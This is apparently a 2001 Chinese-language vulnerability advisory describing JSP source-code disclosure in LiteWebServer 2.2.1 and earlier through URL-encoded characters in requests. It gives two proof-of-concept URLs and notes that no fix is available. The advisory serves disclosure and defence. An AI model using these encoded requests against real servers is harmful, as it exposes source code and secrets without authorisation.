LiteWebServer存在jsp文件源代码可泄露问题发布时间:2001-07-04 更新时间:2001-07-04 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 LiteWebServer version 2.2.1 和之前版本详细描述 LiteWebServer(http://www.gefionsoftware.com/LiteWebServer/index.jsp) 是一个存JAVA WEB服务程序,支持Servlet 2.2 API 和Java Server Pages (JSP) 1.1 通过使用HTML编码字符代替实际字符请求服务器,可导致泄露源代码,如%2E等于 '.',%70等于'p' 测试代码 http://www.example.com:9090/examples/jsp/num/numguess%2Ejsp http://www.example.com:9090/examples/jsp/num/numguess.js%70 解决方案 尚无 相关信息 gluckninja at yahoo.com hans at gefionsoftware.com |